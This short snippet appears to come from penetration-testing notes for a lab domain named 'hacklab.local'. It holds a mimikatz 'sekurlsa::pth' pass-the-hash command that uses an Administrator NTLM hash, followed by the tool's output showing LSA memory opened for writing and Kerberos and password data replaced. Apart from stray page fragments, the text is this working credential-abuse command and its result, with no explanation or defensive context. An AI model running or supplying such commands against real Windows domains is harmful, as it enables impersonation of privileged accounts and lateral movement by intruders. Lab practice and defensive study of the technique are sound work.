pth
mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7
user : Administrator
domain : hacklab.local
program : cmd.exe
impers. : no
NTLM : b09a14d2d325026f8986d4a874fbcbc7
| PID 5896
| TID 4620
| LSA Process is now R/W
| LUID 0 ; 82772120 (00000000:04ef0098)
\_ msv1_0 - data copy @ 0000023A0E8BD5C0 : OK !
\_ kerberos - data copy @ 0000023A0E9FF5A8
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 0000023A0E941CE8 (32) -> null
With token impersonation
Last updated